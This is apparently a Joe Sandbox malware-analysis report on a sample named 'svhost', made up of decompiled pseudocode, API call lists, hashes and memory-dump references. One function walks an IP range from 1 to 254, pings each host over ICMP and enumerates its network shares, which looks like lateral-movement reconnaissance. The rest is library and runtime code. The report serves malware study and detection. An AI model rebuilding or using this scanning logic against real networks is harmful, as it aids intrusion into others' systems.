                                      0x00eba1da
                                      0x00eba1e3
                                      0x00000000
                                      0x00000000
                                      0x00eba1e9
                                      0x00eba1ef
                                      0x00eba1f1
                                      0x00eba1f3
                                      0x00eba1f6
                                      0x00eba1fb
                                      0x00eba1ff
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eba1ff
                                      0x00eba204
                                      0x00eba207
                                      0x00eba209
                                      0x00eba20e
                                      0x00eba2c0
                                      0x00eba2c1
                                      0x00eba2c4
                                      0x00eba2c6
                                      0x00eba474
                                      0x00eba476
                                      0x00000000
                                      0x00eba478
                                      0x00eba478
                                      0x00eba47b
                                      0x00eba47e
                                      0x00eba487
                                      0x00eba48a
                                      0x00eba48b
                                      0x00eba48f
                                      0x00eba492
                                      0x00eba492
                                      0x00000000
                                      0x00eba496
                                      0x00eba2cc
                                      0x00eba2cc
                                      0x00eba2d1
                                      0x00eba2d4
                                      0x00eba2da
                                      0x00eba2e0
                                      0x00eba2e9
                                      0x00eba2ec
                                      0x00eba2ec
                                      0x00eba2ed
                                      0x00eba2ee
                                      0x00eba2f1
                                      0x00eba2f2
                                      0x00000000
                                      0x00eba2f2
                                      0x00eba214
                                      0x00eba223
                                      0x00eba224
                                      0x00eba227
                                      0x00eba229
                                      0x00eba22e
                                      0x00eba43f
                                      0x00eba441
                                      0x00eba443
                                      0x00eba446
                                      0x00eba44b
                                      0x00eba454
                                      0x00eba457
                                      0x00eba458
                                      0x00eba45c
                                      0x00eba45f
                                      0x00eba462
                                      0x00eba462
                                      0x00eba466
                                      0x00eba466
                                      0x00eba466
                                      0x00eba469
                                      0x00eba469
                                      0x00eba469
                                      0x00eba46b
                                      0x00eba46b
                                      0x00eba46f
                                      0x00eba234
                                      0x00eba234
                                      0x00eba238
                                      0x00eba23a
                                      0x00eba23d
                                      0x00eba240
                                      0x00eba244
                                      0x00eba245
                                      0x00eba249
                                      0x00eba249
                                      0x00eba24c
                                      0x00eba251
                                      0x00eba25d
                                      0x00eba262
                                      0x00eba265
                                      0x00eba265
                                      0x00eba26a
                                      0x00eba26c
                                      0x00eba26f
                                      0x00eba271
                                      0x00eba274
                                      0x00eba277
                                      0x00eba27a
                                      0x00eba282
                                      0x00eba286
                                      0x00eba28a
                                      0x00eba28a
                                      0x00eba290
                                      0x00eba296
                                      0x00eba299
                                      0x00eba2a1
                                      0x00eba2a8
                                      0x00eba2ac
                                      0x00eba2ad
                                      0x00eba2b0
                                      0x00eba2b1
                                      0x00eba2f5
                                      0x00eba2f5
                                      0x00eba2f9
                                      0x00eba2fa
                                      0x00eba2ff
                                      0x00eba305
                                      0x00000000
                                      0x00eba30b
                                      0x00eba30f
                                      0x00eba398
                                      0x00eba39f
                                      0x00eba3a7
                                      0x00eba3af
                                      0x00eba3b4
                                      0x00eba3b7
                                      0x00eba3bc
                                      0x00000000
                                      0x00eba3c2
                                      0x00eba3d7
                                      0x00eba4bb
                                      0x00eba4c1
                                      0x00000000
                                      0x00eba3dd
                                      0x00eba3e6
                                      0x00eba3e8
                                      0x00eba3ee
                                      0x00000000
                                      0x00eba3f4
                                      0x00eba3f8
                                      0x00eba42e
                                      0x00eba431
                                      0x00000000
                                      0x00eba437
                                      0x00eba437
                                      0x00000000
                                      0x00eba437
                                      0x00eba3fa
                                      0x00eba3fc
                                      0x00eba3fe
                                      0x00eba417
                                      0x00000000
                                      0x00eba41d
                                      0x00eba421
                                      0x00000000
                                      0x00eba427
                                      0x00eba427
                                      0x00eba42a
                                      0x00eba42b
                                      0x00000000
                                      0x00eba42b
                                      0x00eba421
                                      0x00eba417
                                      0x00eba3f8
                                      0x00eba3ee
                                      0x00eba3d7
                                      0x00eba3bc
                                      0x00eba305
                                      0x00eba22e
                                      0x00000000
                                      0x00eba316
                                      0x00eba316
                                      0x00eba319
                                      0x00eba31d
                                      0x00eba320
                                      0x00eba342
                                      0x00eba345
                                      0x00eba34a
                                      0x00eba34e
                                      0x00eba352
                                      0x00eba380
                                      0x00eba382
                                      0x00000000
                                      0x00eba354
                                      0x00eba354
                                      0x00eba357
                                      0x00eba35a
                                      0x00eba35d
                                      0x00eba498
                                      0x00eba49b
                                      0x00eba4a8
                                      0x00eba4b3
                                      0x00eba4b8
                                      0x00000000
                                      0x00eba363
                                      0x00eba36a
                                      0x00eba36f
                                      0x00eba372
                                      0x00eba375
                                      0x00000000
                                      0x00eba37b
                                      0x00eba37b
                                      0x00000000
                                      0x00eba37b
                                      0x00eba375
                                      0x00eba35d
                                      0x00eba322
                                      0x00eba326
                                      0x00eba329
                                      0x00eba32e
                                      0x00eba334
                                      0x00eba336
                                      0x00eba33d
                                      0x00eba383
                                      0x00eba386
                                      0x00eba387
                                      0x00eba38c
                                      0x00eba38f
                                      0x00eba392
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eba392
                                      0x00000000
                                      0x00eba320
                                      0x00eba1c1
                                      0x00eba4c7
                                      0x00eba4c7
                                      0x00eba4c9
                                      0x00eba4cc
                                      0x00eba4cc
                                      0x00eba4cc
                                      0x00eba4cc
                                      0x00eba4de
                                      0x00eba4e0
                                      0x00eba4e1
                                      0x00eba4e2
                                      0x00eba4e3
                                      0x00eba4e4
                                      0x00eba4e5
                                      0x00eba4ec

                                      APIs
                                      • GetConsoleCP.KERNEL32(00000000,00E62ABC,00000000), ref: 00EBA18B
                                      • __fassign.LIBCMT ref: 00EBA36A
                                      • __fassign.LIBCMT ref: 00EBA387
                                      • WriteFile.KERNEL32(?,00E6118D,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EBA3CF
                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EBA40F
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EBA4BB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                      • String ID:
                                      • API String ID: 4031098158-0
                                      • Opcode ID: 7db2b0c3326db0e6da5436ed6ea1370071ae0519e1664de2074a0bad626a15ed
                                      • Instruction ID: 6e8b59014e07db84b9d189aec8510cbb1b1fd9b7f4a12906be74f0b0b00da833
                                      • Opcode Fuzzy Hash: 7db2b0c3326db0e6da5436ed6ea1370071ae0519e1664de2074a0bad626a15ed
                                      • Instruction Fuzzy Hash: 3BD1CD71D002889FCF15CFE8C9849EEBBB5FF48314F28516AE855FB242D631AA06CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6D590 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E00E6D590(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				signed int _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				char* _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v212;
				signed int _t72;
				signed int _t73;
				signed char _t100;
				void* _t103;
				void* _t107;
				signed int _t170;
				void* _t171;
				void* _t172;
				void* _t176;

				_t176 = __eflags;
				_t169 = __esi;
				_t168 = __edi;
				_t158 = __edx;
				_t118 = __ebx;
				_push(0xffffffff);
				_push(0xec1800);
				_push( *[fs:0x0]);
				_t172 = _t171 - 0xc4;
				_t72 =  *0xeef074; // 0x221cac15
				_t73 = _t72 ^ _t170;
				_v20 = _t73;
				_push(_t73);
				 *[fs:0x0] =  &_v16;
				_v168 = __ecx;
				E00E515C0( &_v32, 0xc);
				E00E566A0( &_v32);
				E00E515C0( &_v56, 0xc);
				E00E6D910(__ebx, _v168, __edx, __edi, __esi, _t176,  &_v56);
				_v172 =  &_v56;
				_v156 = E00E51BE0(_v172);
				_v184 = E00E51BF0(_v172);
				while(1) {
					_t177 = _v156 - _v184;
					if(_v156 == _v184) {
						break;
					}
					E00E57DE0(_t118,  &_v104, _t168, _t169, _t177, _v156);
					_v176 = E00E57920(_t118,  &_v104, _t168, _t169, ".", 0xffffffff);
					_t178 = _v176 - 0xffffffff;
					if(_v176 != 0xffffffff) {
						_t139 =  &_v104;
						E00E578D0( &_v104, _t168, _t169, _t178,  &_v152, 0, _v176 + 1);
						_v160 = 1;
						while(1) {
							_t179 = _v160 - 0xfe;
							if(_v160 > 0xfe) {
								break;
							}
							asm("lfence");
							E00E6E040(_t118,  &_v152, _t168, _t169, _t179,  &_v80,  &_v152, E00E6D560(_t139, _t179,  &_v212, _v160));
							E00E57B40( &_v212);
							_t100 = E00E683A0( &_v104,  &_v104,  &_v80);
							_t172 = _t172 + 0x1c;
							if((_t100 & 0x000000ff) != 0) {
								_t103 = E00E51650( &_v80);
								_t172 = _t172 + 4;
								if((E00E6DB40(_t118, _v168, _t168, _t169, _t103, _a8) & 0x000000ff) != 0) {
									E00E515C0( &_v44, 0xc);
									_t107 = E00E51650( &_v80);
									_t172 = _t172 + 4;
									E00E6DD10(_t118, _v168, _t168, _t169,  &_v44, _t107);
									_v180 =  &_v44;
									_v164 = E00E51BE0(_v180);
									_v188 = E00E51BF0(_v180);
									while(1) {
										_t182 = _v164 - _v188;
										if(_v164 == _v188) {
											break;
										}
										E00E57DE0(_t118,  &_v128, _t168, _t169, _t182, _v164);
										E00E6D830(_t118,  &_v32, _t168, _t169,  &_v128);
										E00E57B40( &_v128);
										_v164 = _v164 + 0x18;
									}
									E00E578B0( &_v44);
								}
							}
							E00E57B40( &_v80);
							_t139 = _v160 + 1;
							__eflags = _t139;
							_v160 = _t139;
						}
						E00E57B40( &_v152);
					}
					E00E57B40( &_v104);
					_t158 = _v156 + 0x18;
					__eflags = _t158;
					_v156 = _t158;
				}
				E00E57460(_a4, E00E51650( &_v32));
				E00E578B0( &_v56);
				E00E578B0( &_v32);
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t170;
				return E00E89A35(_t118, _v20 ^ _t170, _t158, _t168, _t169);
			}































                                      0x00e6d590
                                      0x00e6d590
                                      0x00e6d590
                                      0x00e6d590
                                      0x00e6d590
                                      0x00e6d593
                                      0x00e6d595
                                      0x00e6d5a0
                                      0x00e6d5a1
                                      0x00e6d5a7
                                      0x00e6d5ac
                                      0x00e6d5ae
                                      0x00e6d5b1
                                      0x00e6d5b5
                                      0x00e6d5bb
                                      0x00e6d5c6
                                      0x00e6d5ce
                                      0x00e6d5d8
                                      0x00e6d5e7
                                      0x00e6d5ef
                                      0x00e6d600
                                      0x00e6d611
                                      0x00e6d628
                                      0x00e6d62e
                                      0x00e6d634
                                      0x00000000
                                      0x00000000
                                      0x00e6d644
                                      0x00e6d658
                                      0x00e6d65e
                                      0x00e6d665
                                      0x00e6d67e
                                      0x00e6d681
                                      0x00e6d686
                                      0x00e6d6a1
                                      0x00e6d6a1
                                      0x00e6d6ab
                                      0x00000000
                                      0x00000000
                                      0x00e6d6b1
                                      0x00e6d6d6
                                      0x00e6d6e4
                                      0x00e6d6f1
                                      0x00e6d6f6
                                      0x00e6d6fe
                                      0x00e6d70c
                                      0x00e6d711
                                      0x00e6d725
                                      0x00e6d730
                                      0x00e6d739
                                      0x00e6d73e
                                      0x00e6d74c
                                      0x00e6d754
                                      0x00e6d765
                                      0x00e6d776
                                      0x00e6d78d
                                      0x00e6d793
                                      0x00e6d799
                                      0x00000000
                                      0x00000000
                                      0x00e6d7a5
                                      0x00e6d7b1
                                      0x00e6d7b9
                                      0x00e6d787
                                      0x00e6d787
                                      0x00e6d7c3
                                      0x00e6d7c3
                                      0x00e6d725
                                      0x00e6d7cb
                                      0x00e6d698
                                      0x00e6d698
                                      0x00e6d69b
                                      0x00e6d69b
                                      0x00e6d7db
                                      0x00e6d7db
                                      0x00e6d7e3
                                      0x00e6d61f
                                      0x00e6d61f
                                      0x00e6d622
                                      0x00e6d622
                                      0x00e6d7fd
                                      0x00e6d805
                                      0x00e6d80d
                                      0x00e6d818
                                      0x00e6d823
                                      0x00e6d82d

                                      APIs
                                        • Part of subcall function 00E57920: _WChar_traits.LIBCPMTD ref: 00E5795C
                                      • task.LIBCPMTD ref: 00E6D6E4
                                      • operator!=.LIBCPMTD ref: 00E6D6F1
                                      • task.LIBCPMTD ref: 00E6D7CB
                                        • Part of subcall function 00E6DB40: std::ios_base::good.LIBCPMTD ref: 00E6DB5B
                                        • Part of subcall function 00E6DB40: std::ios_base::good.LIBCPMTD ref: 00E6DB87
                                        • Part of subcall function 00E6DB40: inet_addr.WS2_32(00000000), ref: 00E6DBA0
                                        • Part of subcall function 00E6DB40: IcmpCreateFile.IPHLPAPI ref: 00E6DBB3
                                        • Part of subcall function 00E6DB40: IcmpSendEcho.IPHLPAPI(000000FF,000000FF,?,00000001,00000000,00000000,0000001D,?), ref: 00E6DC07
                                        • Part of subcall function 00E6DB40: IcmpCloseHandle.IPHLPAPI(000000FF), ref: 00E6DC14
                                        • Part of subcall function 00E6DB40: task.LIBCPMTD ref: 00E6DC45
                                        • Part of subcall function 00E6DD10: std::ios_base::good.LIBCPMTD ref: 00E6DD53
                                        • Part of subcall function 00E6DD10: NetShareEnum.NETAPI32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,0000000C,221CAC15), ref: 00E6DDA3
                                        • Part of subcall function 00E6DD10: task.LIBCPMTD ref: 00E6DE68
                                        • Part of subcall function 00E6DD10: task.LIBCPMTD ref: 00E6DE73
                                      • task.LIBCPMTD ref: 00E6D7B9
                                      • task.LIBCPMTD ref: 00E6D7DB
                                      • task.LIBCPMTD ref: 00E6D7E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$Icmpstd::ios_base::good$Char_traitsCloseCreateEchoEnumFileHandleSendShareinet_addroperator!=
                                      • String ID:
                                      • API String ID: 2373676131-0
                                      • Opcode ID: ee61f0de9cc03cd107a4fd8c6a9be78a402bd9788b0ecf6215e382dd858e25c2
                                      • Instruction ID: 4f27b741e20513b5255ecada4a8e80ad5e232672787dfbd6d9566e284135007a
                                      • Opcode Fuzzy Hash: ee61f0de9cc03cd107a4fd8c6a9be78a402bd9788b0ecf6215e382dd858e25c2
                                      • Instruction Fuzzy Hash: 8E615E71E042189FDB14EB60EC92FEEB3B9AF54340F9055A9E41A77192EB306A48CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E52EE0 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E00E52EE0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v32;
				signed int _v33;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				signed int _t42;
				signed int _t43;
				long _t53;
				intOrPtr* _t58;
				void* _t65;
				void* _t95;
				void* _t96;
				signed int _t97;

				_t96 = __esi;
				_t95 = __edi;
				_t65 = __ebx;
				_push(0xffffffff);
				_push(0xebff20);
				_push( *[fs:0x0]);
				_t42 =  *0xeef074; // 0x221cac15
				_t43 = _t42 ^ _t97;
				_v20 = _t43;
				_push(_t43);
				 *[fs:0x0] =  &_v16;
				_v40 = __ecx;
				_v33 = 0;
				E00E57780( &_v24, _v40 + 0xc);
				_v8 = 0;
				if((E00E52C40(_v40 + 0x3c) & 0x000000ff) != 0) {
					_v33 = 1;
				} else {
					_t92 = _a4;
					E00E52D20(_v40 + 0x3c, _a4);
					E00E57720(_a4 + 8, 2);
					E00E52920(_a4);
				}
				_v8 = 0xffffffff;
				E00E57740();
				_t103 = _v33 & 0x000000ff;
				if((_v33 & 0x000000ff) == 0) {
					L12:
					 *[fs:0x0] = _v16;
					return E00E89A35(_t65, _v20 ^ _t97, _t92, _t95, _t96);
				} else {
					_v48 = E00E5A3B0(_t95, _t96, _t103, _a4 + 8, 1, 0);
					_t92 = _v48;
					_v44 = _v48;
					if(_v44 > 3) {
						_t53 = GetCurrentThreadId();
						__eflags = _v48 - _t53;
						if(_v48 != _t53) {
							_v52 = E00E5A3F0(_a4 + 8, 2);
							__eflags = _v52 - 3;
							if(_v52 != 3) {
								E00E515C0( &_v32, 8);
								E00E57830( &_v32, _a4 + 0x34);
								_v8 = 1;
								_t58 = E00E53070( &_v56,  &_a4);
								_t92 =  &_v32;
								__eflags = _a4 + 0xc;
								E00E5A410(_a4 + 0xc,  &_v32,  *_t58);
								_v8 = 0xffffffff;
								E00E577E0();
							}
						}
						goto L12;
					}
					switch( *((intOrPtr*)(_v44 * 4 +  &M00E5303C))) {
						case 0:
							goto L6;
						case 1:
							goto L7;
					}
				}
			}






















                                      0x00e52ee0
                                      0x00e52ee0
                                      0x00e52ee0
                                      0x00e52ee3
                                      0x00e52ee5
                                      0x00e52ef0
                                      0x00e52ef4
                                      0x00e52ef9
                                      0x00e52efb
                                      0x00e52efe
                                      0x00e52f02
                                      0x00e52f08
                                      0x00e52f0b
                                      0x00e52f19
                                      0x00e52f1e
                                      0x00e52f35
                                      0x00e52f5d
                                      0x00e52f37
                                      0x00e52f37
                                      0x00e52f41
                                      0x00e52f4e
                                      0x00e52f56
                                      0x00e52f56
                                      0x00e52f61
                                      0x00e52f6b
                                      0x00e52f74
                                      0x00e52f76
                                      0x00e5301f
                                      0x00e53022
                                      0x00e53037
                                      0x00e52f7c
                                      0x00e52f8f
                                      0x00e52f92
                                      0x00e52f95
                                      0x00e52f9c
                                      0x00e52fac
                                      0x00e52fb1
                                      0x00e52fb4
                                      0x00e52fc9
                                      0x00e52fcc
                                      0x00e52fd0
                                      0x00e52fd7
                                      0x00e52fe6
                                      0x00e52feb
                                      0x00e52ff9
                                      0x00e53001
                                      0x00e53008
                                      0x00e5300b
                                      0x00e53010
                                      0x00e5301a
                                      0x00e5301a
                                      0x00e52fd0
                                      0x00000000
                                      0x00e52fb4
                                      0x00e52fa1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00e52fa1

                                      APIs
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E52F19
                                      • List.LIBCMTD ref: 00E52F2B
                                      • SafeRWList.LIBCONCRTD ref: 00E52F6B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: List$Concurrency::details::_CriticalLock::_ReentrantSafeScoped_lockScoped_lock::_
                                      • String ID:
                                      • API String ID: 2309065532-0
                                      • Opcode ID: 1d6ca6fdef64c9af75f647ba44e85e10344f82b9ee46c081e49c771d3466ca16
                                      • Instruction ID: a5d13a76bebb5f0da9dba6ae2b574f748ccd5e338924d4975a7c004c53bbac5f
                                      • Opcode Fuzzy Hash: 1d6ca6fdef64c9af75f647ba44e85e10344f82b9ee46c081e49c771d3466ca16
                                      • Instruction Fuzzy Hash: 80418270900208DBCB08DFA8DC51BEEB7B1EF45346F14962DE9167B2C2DB315A08CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5A2C0 Relevance: 9.1, APIs: 6, Instructions: 71COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 66%
                                      			E00E5A2C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebp;
				signed int _t23;
				signed int _t24;
				void* _t33;
				signed char _t34;
				void* _t42;
				char* _t48;
				void* _t56;
				void* _t57;
				signed int _t58;
				void* _t59;
				void* _t63;
				intOrPtr _t64;

				_t57 = __esi;
				_t56 = __edi;
				_t42 = __ebx;
				_push(0xffffffff);
				_push(0xec0768);
				_push( *[fs:0x0]);
				_t23 =  *0xeef074; // 0x221cac15
				_t24 = _t23 ^ _t58;
				_v20 = _t24;
				_push(_t24);
				 *[fs:0x0] =  &_v16;
				E00E515C0( &_v28, 8);
				E00E51390();
				_v8 = 0;
				E00E5C300( &_v36, E00E51650(_a8),  &_v28);
				_v40 = E00E5C370;
				_t55 =  &_v36;
				_t33 = E00E7258B(_a4, _v40, E00E51650( &_v36));
				_t63 = _t59 - 0x1c + 0x14;
				if(_t33 == 0) {
					_t48 =  &_v28;
					_t34 = E00E514D0();
					_t55 = _t34 & 0x000000ff;
					__eflags = _t34 & 0x000000ff;
					if(__eflags != 0) {
						_t64 = _t63 - 8;
						_t48 = _t64;
						_v44 = _t64;
						E00E51430( &_v28);
						E00E51600();
					}
					E00E725A3(_t42, _t48, _t56, _t57, __eflags);
					_v8 = 0xffffffff;
					E00E513E0();
				} else {
					_v8 = 0xffffffff;
					E00E513E0();
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t42, _v20 ^ _t58, _t55, _t56, _t57);
			}























                                      0x00e5a2c0
                                      0x00e5a2c0
                                      0x00e5a2c0
                                      0x00e5a2c3
                                      0x00e5a2c5
                                      0x00e5a2d0
                                      0x00e5a2d4
                                      0x00e5a2d9
                                      0x00e5a2db
                                      0x00e5a2de
                                      0x00e5a2e2
                                      0x00e5a2ed
                                      0x00e5a2f5
                                      0x00e5a2fa
                                      0x00e5a315
                                      0x00e5a31a
                                      0x00e5a321
                                      0x00e5a336
                                      0x00e5a33b
                                      0x00e5a340
                                      0x00e5a353
                                      0x00e5a356
                                      0x00e5a35b
                                      0x00e5a35e
                                      0x00e5a360
                                      0x00e5a362
                                      0x00e5a365
                                      0x00e5a367
                                      0x00e5a36e
                                      0x00e5a373
                                      0x00e5a373
                                      0x00e5a378
                                      0x00e5a37d
                                      0x00e5a387
                                      0x00e5a342
                                      0x00e5a342
                                      0x00e5a34c
                                      0x00e5a34c
                                      0x00e5a38f
                                      0x00e5a3a4

                                      APIs
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E5A2F5
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E5A34C
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E5A356
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E5A36E
                                      • std::rethrow_exception.LIBCMTD ref: 00E5A373
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E5A387
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::exception_ptr::~exception_ptr$std::exception_ptr::exception_ptr$std::rethrow_exception
                                      • String ID:
                                      • API String ID: 1864382771-0
                                      • Opcode ID: 5b557b5bb7bee4b5b050719947a6bd1575ddc4961eaf8d357839309cbcc5bd31
                                      • Instruction ID: a933b91a51b95f1416892fc46a06f4e15d207e16cc8f093c37e5062403bf32fc
                                      • Opcode Fuzzy Hash: 5b557b5bb7bee4b5b050719947a6bd1575ddc4961eaf8d357839309cbcc5bd31
                                      • Instruction Fuzzy Hash: 9021A471D002099BCB04EFA4D852BFEB7F8AB04355F445AA9F916771C1EF30AA08CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA3090 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00EA3090(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xeef170 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00EA426D(_t13, __eflags,  *0xeef170);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00EA42A8(_t14, __eflags,  *0xeef170, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E00EA5995();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00EA42A8(_t18, __eflags,  *0xeef170, 0);
								} else {
									_t8 = E00EA42A8(_t18, __eflags,  *0xeef170, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00EA478C(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












                                      0x00ea3090
                                      0x00ea3097
                                      0x00ea30aa
                                      0x00ea30b1
                                      0x00ea30b3
                                      0x00ea30b4
                                      0x00ea30b7
                                      0x00ea30d0
                                      0x00ea30d0
                                      0x00ea30b9
                                      0x00ea30b9
                                      0x00ea30bb
                                      0x00ea30c5
                                      0x00ea30cc
                                      0x00ea30ce
                                      0x00ea30d5
                                      0x00ea30de
                                      0x00ea30e1
                                      0x00ea30e2
                                      0x00ea30e4
                                      0x00ea30f8
                                      0x00ea30f8
                                      0x00ea3101
                                      0x00ea30e6
                                      0x00ea30ed
                                      0x00ea30f3
                                      0x00ea30f4
                                      0x00ea30f6
                                      0x00ea310a
                                      0x00ea310c
                                      0x00ea310c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea30f6
                                      0x00ea310f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea30ce
                                      0x00ea30bb
                                      0x00ea3117
                                      0x00ea3121
                                      0x00ea3099
                                      0x00ea309b
                                      0x00ea309b

                                      APIs
                                      • GetLastError.KERNEL32(?,?,00EA3087,00EA0A85,00E7144E,00000008,00E7176B,00000008,?,?,?,00E51583,?,00000008,221CAC15), ref: 00EA309E
